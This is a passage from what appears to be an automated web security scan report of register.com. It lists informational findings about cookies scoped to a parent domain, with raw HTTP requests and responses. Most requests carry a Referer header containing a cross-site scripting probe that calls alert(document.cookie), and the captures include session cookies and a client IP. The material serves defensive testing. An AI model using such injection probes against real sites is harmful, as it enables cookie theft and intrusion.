GET /ssl/ssl-certificates.aspx HTTP/1.1
Host: www.godaddy.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=hjhwaz45up3pxz55cnrxsi55; ASPSESSIONIDACSTCQTS=OBJPAOKANJKKAGECLEBMBEIM; flag1=cflag=us; currencypopin1=cdisplaypopin=false; SplitValue1=24; BlueLithium_ssl=dbdflblbdeidccshddredcccjfvazaii; GoogleADServicesgooglessl=dbdflblbdeidccshddredcccjfvazaii; pathway=8d587be0-834e-4a03-83dc-2f3bcb783a40; ShopperId1=yjjjodldcfygaahhseaipjhbleigjbpa; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMinorVer=3&fMajorVer=10&slMajorVer=-1&slMinorVer=-1; pagecount=2; actioncount=; app_pathway=; visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40; domainYardVal=%2D1; serverVersion=A; preferences1=_sid=yishkaeegbnbqewgxixgkfpfeekbejsf&dataCenterCode=US&gdshop_currencyType=USD; adc1=US; currency1=potableSourceStr=USD; traffic=cookies=1&referrer=http://www.godaddy.com/gdshop/offers/cross_sell.asp?ci=42031&config=ssldefault&sitename=cart.godaddy.com&page=/basket.aspx&server=M1PWCARTWEB009&status=200 OK&querystring=app_hdr=&piishown=0&shopper=46215684&privatelabelid=1&isc=&clientip=50.23.123.106&referringpath=8d587be0-834e-4a03-83dc-2f3bcb783a40&split=24&referringdomain=

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Mon, 03-Sep-2012 21:48:52 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Mon, 03-Sep-2012 21:48:52 GMT; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/ssl/ssl-certificates.aspx&server=M1PWCORPWEB109&status=200 OK&querystring=%26hpGoogleStatic%3d1&shopper=46215917&privatelabelid=1&isc="&clientip=50.23.123.106&referringpath=19a7e39c-dcff-40f6-8f6d-e19d0c50259d&referringdomain=&split=69; domain=godaddy.com; path=/
Set-Cookie: BlueLithium_ssl=rezcqjcaqgtalgqbijnijijbnhagqigb; domain=godaddy.com; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Sat, 03 Sep 2011 21:48:51 GMT
Content-Length: 134936


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><
...[SNIP]...

10.64. http://www.register.com/css/basic.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.register.com
Path:   /css/basic.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /css/basic.css HTTP/1.1
Host: www.register.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.register.com/font41cfd%22%3balert(document.cookie)//a7bdf3e7ba5/vag-bold.ttf
Cookie: TSfd06f3=bbd4ebd43769aa5fc0b4deb47307bc5934fb6f4d2b0d40564e629da2286023f2e0a1e568948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 21:36:10 GMT
Set-Cookie: TLTSID=BDC26718D67410D617BB9E98795010A3; Path=/; Domain=.register.com
HostName: atleuapp02.galt.register.com
Last-Modified: Mon, 29 Aug 2011 07:46:11 GMT
ETag: "48e6e-2a0dc-4aba016b636c0"
Accept-Ranges: bytes
P3P: policyref="http://www.register.com/websitepolicy.xml"
Content-Type: text/css
Set-Cookie: TSfd06f3=d2937cbf720198647e74b325b537776034fb6f4d2b0d40564e629da2286023f234aaaa7a948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758; Path=/
Vary: Accept-Encoding, User-Agent
Content-Length: 172252

/* Register - basic.css
/* Register - basic.css
---------------------------------------*/
/*    1. Global Elements/Classes
       a. Browser Reset
       b. Font Definitions
       c. Element Styles
       d. Global Classe
...[SNIP]...

10.65. http://www.register.com/css/titan-screen.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.register.com
Path:   /css/titan-screen.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /css/titan-screen.css HTTP/1.1
Host: www.register.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.register.com/font41cfd%22%3balert(document.cookie)//a7bdf3e7ba5/vag-bold.ttf
Cookie: TSfd06f3=bbd4ebd43769aa5fc0b4deb47307bc5934fb6f4d2b0d40564e629da2286023f2e0a1e568948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 21:36:10 GMT
Set-Cookie: TLTSID=BDC29F30D67410D61BCEC691FA7F6315; Path=/; Domain=.register.com
HostName: atleuapp05.galt.register.com
Last-Modified: Mon, 29 Aug 2011 07:46:23 GMT
ETag: "48e69-2c2c-4aba0176d51c0"
Accept-Ranges: bytes
Content-Length: 11308
P3P: policyref="http://www.register.com/websitepolicy.xml"
Content-Type: text/css
Set-Cookie: TSfd06f3=674af69769fa119224d9d19bfb161e4634fb6f4d2b0d40564e629da2286023f2beb4fbf0948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758; Path=/
Vary: Accept-Encoding, User-Agent
Connection: Keep-Alive

/*Thickbox - formerly thickbox.css
---------------------------------------*/
   /* **Added by HUGE** */
   
   .thickbox {
       visibility:hidden;
   }
   
   /* -----------------------------------------------------
...[SNIP]...

10.66. http://www.register.com/imgs/global/crtIcon.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.register.com
Path:   /imgs/global/crtIcon.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /imgs/global/crtIcon.gif HTTP/1.1
Host: www.register.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.register.com/font41cfd%22%3balert(document.cookie)//a7bdf3e7ba5/vag-bold.ttf
Cookie: TSfd06f3=bbd4ebd43769aa5fc0b4deb47307bc5934fb6f4d2b0d40564e629da2286023f2e0a1e568948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 21:36:12 GMT
Set-Cookie: TLTSID=BEBCC488D67410D6177BEE195E4E2E9D; Path=/; Domain=.register.com
HostName: atleuapp02.galt.register.com
Last-Modified: Mon, 29 Aug 2011 07:46:33 GMT
ETag: "c337a-1ab-4aba01805e840"
Accept-Ranges: bytes
Content-Length: 427
P3P: policyref="http://www.register.com/websitepolicy.xml"
Content-Type: image/gif
Set-Cookie: TSfd06f3=989560f402c52ef6e5467a0378482f6234fb6f4d2b0d40564e629da2286023f235ed6f81948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758; Path=/

GIF89a.........z..............).....:..............[..H.....z..m..N..d..f...........{........................!.......,............'.di....+.m......8.a<.m..g..h...b...d...`.X.XA...`."NF.)..g...    n0.n`N.
...[SNIP]...

10.67. http://www.register.com/imgs/global/registerLogo.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.register.com
Path:   /imgs/global/registerLogo.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /imgs/global/registerLogo.gif HTTP/1.1
Host: www.register.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.register.com/font41cfd%22%3balert(document.cookie)//a7bdf3e7ba5/vag-bold.ttf
Cookie: TSfd06f3=bbd4ebd43769aa5fc0b4deb47307bc5934fb6f4d2b0d40564e629da2286023f2e0a1e568948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 21:36:12 GMT
Set-Cookie: TLTSID=BEB0737CD67410D61C12CE72E6515F79; Path=/; Domain=.register.com
HostName: atleuapp05.galt.register.com
Last-Modified: Mon, 29 Aug 2011 07:46:30 GMT
ETag: "34e516-b9e-4aba017d82180"
Accept-Ranges: bytes
Content-Length: 2974
P3P: policyref="http://www.register.com/websitepolicy.xml"
Content-Type: image/gif
Set-Cookie: TSfd06f3=36a9a6be0fb65991f3e0ada517cd8fc334fb6f4d2b0d40564e629da2286023f2d77d8819948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758; Path=/

GIF89aU.5.........o............b..7.r.............|Y.....?.qK................................................!.......,....U.5.... $.di.h....<...tm.x..|....p.z..@....:...tJ...F..'.
...xL......78d.H.|N.
...[SNIP]...

10.68. http://www.register.com/js/aop-attach.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.register.com
Path:   /js/aop-attach.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/aop-attach.js HTTP/1.1
Host: www.register.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.register.com/font41cfd%22%3balert(document.cookie)//a7bdf3e7ba5/vag-bold.ttf
Cookie: TSfd06f3=bbd4ebd43769aa5fc0b4deb47307bc5934fb6f4d2b0d40564e629da2286023f2e0a1e568948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 21:36:12 GMT
Set-Cookie: TLTSID=BE9FF4FCD67410D61AE2879D611DB162; Path=/; Domain=.register.com
HostName: atleuapp03.galt.register.com
Last-Modified: Mon, 29 Aug 2011 07:46:22 GMT
ETag: "1256cd-605-4aba0175e0f80"
Accept-Ranges: bytes
Content-Length: 1541
P3P: policyref="http://www.register.com/websitepolicy.xml"
Content-Type: application/javascript
Set-Cookie: TSfd06f3=153cfa4d0e155325732f47ed9bffcede34fb6f4d2b0d40564e629da2286023f28cb47c3f948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758; Path=/


function unloadWin(evt){
   // We disable all popups unless the browser is IE
   var disablePopup = true;
   if(!evt) {
       // Yuck - check to see if the mouse cursor is in the general vicinity of where
       /
...[SNIP]...

10.69. http://www.register.com/js/global.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.register.com
Path:   /js/global.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/global.js HTTP/1.1
Host: www.register.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.register.com/font41cfd%22%3balert(document.cookie)//a7bdf3e7ba5/vag-bold.ttf
Cookie: TSfd06f3=bbd4ebd43769aa5fc0b4deb47307bc5934fb6f4d2b0d40564e629da2286023f2e0a1e568948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 21:36:11 GMT
Set-Cookie: TLTSID=BDF05740D67410D61BCAF1EA8061C90E; Path=/; Domain=.register.com
HostName: atleuapp05.galt.register.com
Last-Modified: Mon, 29 Aug 2011 07:46:16 GMT
ETag: "14b215-beba-4aba017028200"
Accept-Ranges: bytes
Content-Length: 48826
P3P: policyref="http://www.register.com/websitepolicy.xml"
Content-Type: application/javascript
Set-Cookie: TSfd06f3=980743b8ff4ec39c11121c1d3b73b51a34fb6f4d2b0d40564e629da2286023f23b79d92e948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758; Path=/

root_path = "/";
$(document).ready(function () {
   $.fn.hover = function (C, B) {
       function A(E) {
           var D = E.relatedTarget;
           while (D && D != this) {
               try {
                   D = D.parentNode;
               }
               ca
...[SNIP]...

10.70. http://www.register.com/js/jquery-1.3.2.min.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.register.com
Path:   /js/jquery-1.3.2.min.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/jquery-1.3.2.min.js HTTP/1.1
Host: www.register.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.register.com/font41cfd%22%3balert(document.cookie)//a7bdf3e7ba5/vag-bold.ttf
Cookie: TSfd06f3=bbd4ebd43769aa5fc0b4deb47307bc5934fb6f4d2b0d40564e629da2286023f2e0a1e568948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 21:36:11 GMT
Set-Cookie: TLTSID=BDEEFB98D67410D61AB284001024AF96; Path=/; Domain=.register.com
HostName: atleuapp03.galt.register.com
Last-Modified: Mon, 29 Aug 2011 07:46:18 GMT
ETag: "14b223-dfa6-4aba017210680"
Accept-Ranges: bytes
Content-Length: 57254
P3P: policyref="http://www.register.com/websitepolicy.xml"
Content-Type: application/javascript
Set-Cookie: TSfd06f3=e8f3561ae36189d24acc768ec35fb74a34fb6f4d2b0d40564e629da2286023f278b2737d948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758; Path=/

/*
* jQuery JavaScript Library v1.3.2
* http://jquery.com/
*
* Copyright (c) 2009 John Resig
* Dual licensed under the MIT and GPL licenses.
* http://docs.jquery.com/License
*
* Date: 2009-02-
...[SNIP]...

10.71. http://www.register.com/js/jquery-ui-1.7.1.custom.min.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.register.com
Path:   /js/jquery-ui-1.7.1.custom.min.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/jquery-ui-1.7.1.custom.min.js HTTP/1.1
Host: www.register.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.register.com/font41cfd%22%3balert(document.cookie)//a7bdf3e7ba5/vag-bold.ttf
Cookie: TSfd06f3=bbd4ebd43769aa5fc0b4deb47307bc5934fb6f4d2b0d40564e629da2286023f2e0a1e568948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 21:36:11 GMT
Set-Cookie: TLTSID=BDF9F0ACD67410D61D11B0753FBACCA0; Path=/; Domain=.register.com
HostName: atleuapp01.galt.register.com
Last-Modified: Mon, 29 Aug 2011 07:46:15 GMT
ETag: "1dfa9e-b6ad-4aba016f33fc0"
Accept-Ranges: bytes
Content-Length: 46765
P3P: policyref="http://www.register.com/websitepolicy.xml"
Content-Type: application/javascript
Set-Cookie: TSfd06f3=301b647cf522da421558aacb50cc2aa234fb6f4d2b0d40564e629da2286023f26c256ffa948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758; Path=/

/*
* jQuery UI 1.7.1
*
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt)
* and GPL (GPL-LICENSE.txt) licenses.
*
* http://docs.jquery.
...[SNIP]...

10.72. http://www.register.com/js/jquery.cookie.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.register.com
Path:   /js/jquery.cookie.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/jquery.cookie.js HTTP/1.1
Host: www.register.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.register.com/font41cfd%22%3balert(document.cookie)//a7bdf3e7ba5/vag-bold.ttf
Cookie: TSfd06f3=bbd4ebd43769aa5fc0b4deb47307bc5934fb6f4d2b0d40564e629da2286023f2e0a1e568948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 21:36:11 GMT
Set-Cookie: TLTSID=BDF5A8C6D67410D617CC97B16A7B361F; Path=/; Domain=.register.com
HostName: atleuapp02.galt.register.com
Last-Modified: Mon, 29 Aug 2011 07:46:13 GMT
ETag: "14b21d-1096-4aba016d4bb40"
Accept-Ranges: bytes
Content-Length: 4246
P3P: policyref="http://www.register.com/websitepolicy.xml"
Content-Type: application/javascript
Set-Cookie: TSfd06f3=4d632488d63df192acaddb778076d1e434fb6f4d2b0d40564e629da2286023f20d60c5e2948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758; Path=/

/**
* Cookie plugin
*
* Copyright (c) 2006 Klaus Hartl (stilbuero.de)
* Dual licensed under the MIT and GPL licenses:
* http://www.opensource.org/licenses/mit-license.php
* http://www.gnu.org/li
...[SNIP]...

10.73. http://www.register.com/js/jquery.jcarousellite.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.register.com
Path:   /js/jquery.jcarousellite.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/jquery.jcarousellite.js HTTP/1.1
Host: www.register.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.register.com/font41cfd%22%3balert(document.cookie)//a7bdf3e7ba5/vag-bold.ttf
Cookie: TSfd06f3=bbd4ebd43769aa5fc0b4deb47307bc5934fb6f4d2b0d40564e629da2286023f2e0a1e568948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 21:36:11 GMT
Set-Cookie: TLTSID=BDEF2F14D67410D61AB7CB3A6F264AD2; Path=/; Domain=.register.com
HostName: atleuapp01.galt.register.com
Last-Modified: Mon, 29 Aug 2011 07:46:13 GMT
ETag: "14b226-8c3-4aba016d4bb40"
Accept-Ranges: bytes
Content-Length: 2243
P3P: policyref="http://www.register.com/websitepolicy.xml"
Content-Type: application/javascript
Set-Cookie: TSfd06f3=6cb398fe6f3b95e43e8ce0909fb5138934fb6f4d2b0d40564e629da2286023f26b0cd9e2948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758; Path=/

(function(D){D.fn.jCarouselLite=function(E){E=D.extend({btnPrev:null,btnNext:null,btnGo:null,mouseWheel:false,auto:null,speed:200,easing:null,vertical:false,circular:true,visible:3,start:0,scroll:1,be
...[SNIP]...

10.74. http://www.register.com/js/mbox.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.register.com
Path:   /js/mbox.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/mbox.js HTTP/1.1
Host: www.register.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.register.com/font41cfd%22%3balert(document.cookie)//a7bdf3e7ba5/vag-bold.ttf
Cookie: TSfd06f3=bbd4ebd43769aa5fc0b4deb47307bc5934fb6f4d2b0d40564e629da2286023f2e0a1e568948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 21:36:12 GMT
Set-Cookie: TLTSID=BE921B52D67410D610B7F5DDB44FC95E; Path=/; Domain=.register.com
HostName: atleuapp04.galt.register.com
Last-Modified: Mon, 29 Aug 2011 07:46:23 GMT
ETag: "14b217-5f99-4aba0176d51c0"
Accept-Ranges: bytes
Content-Length: 24473
P3P: policyref="http://www.register.com/websitepolicy.xml"
Content-Type: application/javascript
Set-Cookie: TSfd06f3=c71c7a115bf6f15bfb96be371425b9f134fb6f4d2b0d40564e629da2286023f2951be06a948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758; Path=/

var mboxCopyright = "Copyright 1996-2009. Adobe Systems Incorporated. All rights reserved";mboxUrlBuilder = function(a, b) { this.a = a; this.b = b; this.c = new Array(); this.d = function(e) { return
...[SNIP]...

10.75. http://www.register.com/js/nicejforms.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.register.com
Path:   /js/nicejforms.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/nicejforms.js HTTP/1.1
Host: www.register.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.register.com/font41cfd%22%3balert(document.cookie)//a7bdf3e7ba5/vag-bold.ttf
Cookie: TSfd06f3=bbd4ebd43769aa5fc0b4deb47307bc5934fb6f4d2b0d40564e629da2286023f2e0a1e568948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 21:36:12 GMT
Set-Cookie: TLTSID=BEB668E0D67410D61C0F8B256BAF5161; Path=/; Domain=.register.com
HostName: atleuapp05.galt.register.com
Last-Modified: Mon, 29 Aug 2011 07:46:23 GMT
ETag: "1dfaa1-1e84-4aba0176d51c0"
Accept-Ranges: bytes
Content-Length: 7812
P3P: policyref="http://www.register.com/websitepolicy.xml"
Content-Type: application/javascript
Set-Cookie: TSfd06f3=f6bf8e381ccc97699cb09ef86948cfb734fb6f4d2b0d40564e629da2286023f20921a71a948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758; Path=/

jQuery.NiceJForms={options:{selectRightSideWidth:27,selectLeftSideWidth:1,selectAreaHeight:21,selectAreaOptionsOverlap:2,imagesPath:(typeof (root_path)!="undefined"?root_path:"/")+"imgs/formElements/"
...[SNIP]...

10.76. http://www.register.com/js/s_code.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.register.com
Path:   /js/s_code.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/s_code.js HTTP/1.1
Host: www.register.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.register.com/font41cfd%22%3balert(document.cookie)//a7bdf3e7ba5/vag-bold.ttf
Cookie: TSfd06f3=bbd4ebd43769aa5fc0b4deb47307bc5934fb6f4d2b0d40564e629da2286023f2e0a1e568948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 21:36:12 GMT
Set-Cookie: TLTSID=BEBC2690D67410D6183AD437200921A1; Path=/; Domain=.register.com
HostName: atleuapp02.galt.register.com
Last-Modified: Mon, 29 Aug 2011 07:46:10 GMT
ETag: "1256cc-7ff7-4aba016a6f480"
Accept-Ranges: bytes
Content-Length: 32759
P3P: policyref="http://www.register.com/websitepolicy.xml"
Content-Type: application/javascript
Set-Cookie: TSfd06f3=184443db25c7545d79e2025b8b0c50dd34fb6f4d2b0d40564e629da2286023f28ac38e07948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758; Path=/

/* SiteCatalyst code version: H.20.3.
Copyright 1997-2009 Omniture, Inc. More info available at
http://www.omniture.com */


var hostname = (top.location.host);
var s_account="";

switch(hostname) {
   
...[SNIP]...

10.77. http://www.register.com/js/thickbox.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.register.com
Path:   /js/thickbox.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

